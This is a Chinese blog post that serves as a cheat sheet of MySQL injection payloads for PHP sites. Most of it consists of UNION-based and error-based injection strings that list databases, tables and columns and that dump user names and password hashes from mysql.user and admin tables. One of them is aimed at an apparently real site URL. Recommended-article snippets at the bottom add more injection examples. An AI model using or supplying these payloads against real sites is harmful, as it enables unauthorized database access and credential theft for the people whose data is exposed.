php mysql盲注_php mysql 常用高级注入语句

最新推荐文章于 2022-09-21 18:29:41 发布
最新推荐文章于 2022-09-21 18:29:41 发布
阅读量165 收藏
点赞数
文章标签: php mysql盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29349409/article/details/113153766
版权

盲注查询:

and (select count(*) from mysql.user)>0/*   查看权限

1:system_user() 系统用户名

2:user()        用户名

3:current_user  当前用户名

4:session_user()连接数据库的用户名

5:database()    数据库名

6:version()     MYSQL数据库版本

7:load_file()   MYSQL读取本地文件的函数

8:@@datadir     读取数据库路径

9:@@basedir    MYSQL 安装路径

10:@@version_compile_os   操作系统  Windows Server 2003,

############################################################################################################

查看用户和密码:

http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12+from+mysql.user

查看有多少列:select 。。。 from information_schema.SCHEMATA–

查询当前用户:

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r

and(0)*2))x+from+information_schema.tables+group+by+x)a)

用户 数据库名称 数据库版本:

and+substring(@@version,1,1)=4

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13/*

有时加上“/*” 会报错,所以此时需要去掉“/*”

#########################################    暴库     ######################################################

and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7,8,9,10,11 from information_schema.SCHEMATA limit 1,1/*

其中“limit 1,1” 中前面的数字“1”可以增加来查看多个库 (有时加上“/*” 会报错,所以此时需要去掉“/*”)

暴所有库:

+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns

读出所有库:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“LIMIT 0,1” 此处的0可看多个库

爆当前数据库

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

查询当前数据库:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo

or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

####################################################################################################################################################################################################################################################################################################################################

####################################      快速爆表     #####################################################

爆所有表

and+1=2+union+select+1,group_concat(distinct+table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()

爆所有表

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=0x666C6965725F6462617365 或者=( database() )也行

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

有时加上“/*” 会报错,所以此时需要去掉“/*”

+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.tables+where+table_schema=0x697266+order+by+table_schema+limit+0,1)t+limit+1--

注:“table_schema=0x697266” 为上面查到的库的hex值  且“limit+0,1)”中的0可一直增加查看多个表

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x70726F64756374 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_schema”后面的 “limit 0,1”中的0可爆多个表

####################################################################################################################################################################################################################################################################################################################################

##############################################      快速暴字段      ########################################

and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*

limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个字段。

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572

读出所有表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)为admin的ascii码 依次类推

and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出来的表名的hex值+and+table_schema=数据库名的hex值+order+by+1+limit+0,1)t+limit+1--

注:其中“limit+0,1)”中的0可以一直增加来查看多个字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_name”后面的“limit 0,1”可爆多个字段

####################################################################################################################################################################################################################################################################################################################################

#################################        查看字段内容:       #############################################

and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster

and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*

union select 1,group_concat(username,0x3a,password),3,4,5... from 表(或表的hex值)

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

利利川
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php盲注暴表语句
08-12
php 注入 常用代码 爆表,自已整理的一些脚本
PHP+MYSQL 注入靶场
最新发布
04-26
PHP+MYSQL注入靶场中,PHP文件(如`index.php`)处理用户请求并与MySQL数据库交互。如果PHP代码没有正确地转义或预处理用户输入,就可能导致SQL注入漏洞。例如,直接拼接用户输入到SQL查询中,而不是使用参数化...
php mysql盲注_PHP安全:SQL注入漏洞
weixin_39872222的博客
02-28 247
原标题:PHP安全:SQL注入漏洞本文介绍由于PHP的不安全编码引起的各类SQL注入。经常看到网站被拖库,造成信息泄露,主要就是SQL注入漏洞造成的。1、什么是SQL注入SQL注入漏洞为PHP研发人员所熟知,它是所有漏洞类型中危害最严重的漏洞之一。SQL注入漏洞,主要是通过伪造客户端请求,把SQL命令提交到服务端进行非法请求的操作,最终达到欺骗服务器从而执行恶意的SQL命令。研发人员在处理应用程序...
PHP+MySQL手工注入语句大全 MySQL手工注入语句总结
qq_40083102的博客
11-13 219
暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all s...
数据库盲注php代码
明哥哥知识分享
08-17 199
数据库自动盲注代码 <?php function juhecurl($url,$params=false,$ispost=0){ $httpInfo = array(); $ch = curl_init(); curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 ); curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 10
php mysql 编程原理_浅析PHP+MYSQL注射原理及其逐步深入利用
weixin_39904587的博客
01-19 107
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
PHP+mysql防止SQL注入的方法小结
10-17
PHPMySQL的开发中,SQL注入是一种常见的安全威胁。攻击者通过在输入字段中插入恶意的SQL代码,试图破坏应用程序的数据库查询,从而达到盗取数据、篡改数据甚至控制数据库服务器的目的。为了解决这个问题,我们...
PHPmysql(手工注入
10-12
PHP手工注入,全称MySQL手工SQL注入,是指攻击者通过输入恶意的SQL语句,利用应用程序对用户输入数据的不恰当处理,从而操控数据库,获取敏感信息或执行非授权操作。这种攻击方式通常发生在开发者未对用户输入进行...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL 高级盲注:布尔型盲注详解】 MySQL盲注,特别是布尔型盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注...
php基于错误的盲注,盲注基本原理
weixin_29266647的博客
04-14 221
最近找到一个带有注入的美国网站,发现是盲注,简单讲讲盲注的原理。1.xxx.com/index.php?ID=79这个位置单引号报错,并且直接给出错误信息:SQL: SELECT *FROM catalog WHERE ID = '79''知道了他的表是catalog,并且是单引号闭合。2.尝试闭合,输入‘ --+ 后,页面返回正常。3.开始猜测字段。输入ID=79' order by 5--+教...
PHP盲注常用语句
收集盒 Book box
06-27 1231
整理了一些盲注语句,有时候搞站的时候用的着。希望对大家也有用,大牛小牛们用的着就尽管拿吧。判断版本号:http://www.tmdsb.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%
PHP+MYSQL手工盲注
weixin_33938733的博客
06-12 91
大家好,我是乄 God epilepsy 扣扣:929777981,今天给大家带来PHP+MYSQL手工盲注教程,虽然注入并不是神马新技术了,但是还是有很多盆友不会,很多盆友都是借助sqlmap,如果有墙,你们的sqlmap还能行嘛?好了废话不多说,新手教程,大鸟跳过!PS:这篇文章写的很烂噢,大家将就看下吧,送给正在努力向前走的盆友,另外欢迎各位大牛私聊一起讨论绕过各种防火...
php基于错误的盲注,phpcms 2008广告模块注入漏洞及修复方案
weixin_29807369的博客
04-14 310
简要描述:phpcms 2008 中广告模块,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间和错误的盲注详细说明:js.phpchdir('../ads/');require './ad.php';?>ad.phprequire './include/common.inc.php';$year = date('ym',T...
php mysql盲注_注入学习(3) Mysql+php注入 基于bool和时间的盲注
weixin_30423065的博客
01-18 203
练习三:Mysql+php 基于bool和时间的盲注今天要用的函数(详细的直接看链接):left()函数:left()得到字符串左部指定个数的字符  left( string, n ) #string为要截取的字符串,n为长度limit()函数:标准定义找百度  limit(a,b) #我的理解 从第a个位置,截取b个数据if语句/if()函数:在MySQL中语法如下  if(a,b,c) #...
mysql insert 注入_Mysql 下 Insert、Update、Delete、Order By、Group By注入
weixin_42376118的博客
01-19 228
Insert:语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)报错注入:insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');insert into te...
Background-2 盲注的讲解
lixiangminghate的专栏
06-23 262
转自:lcarmy何为盲注盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从background-1中,我们可以知道盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注Ps:知识点太多了,这里只能简单列出来大致讲解一下。(ps:每当看到前辈的奇淫技巧的payload时,能想象...
【ZeyFraのWeb开发经验09】关于Field injection is not recommended的警告提示
ZeyFraの博客
09-26 219
不再推荐使用字段注入
计算机网络------数据链路层与交换机
cloud_engineer的博客
09-21 1489
数据链路层与交换机
C语言宏定义中#用法
10-17 468
C语言宏定义中#用法 宏中"#"和"##"的用法一、一般用法我们使用#把宏参数变为一个字符串,用##把两个宏参数贴合在一起.用法:#i nclude#i ncludeusing namespace std;#define STR(s)     #s#define CONS(a,b)  int(a##e##b)int main(){    printf(STR(vck));           
Mysql注入教程:基础与进阶操作
文档还引用了Sqli-labs的相关资源,这是一个用于学习和实践SQL注入防御的教程,作者Lcamry分享了从基础挑战到高级注入技巧,包括背景知识、盲注、导入导出操作、增删改函数、HTTP头部理解等内容。这些章节详细讲解了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值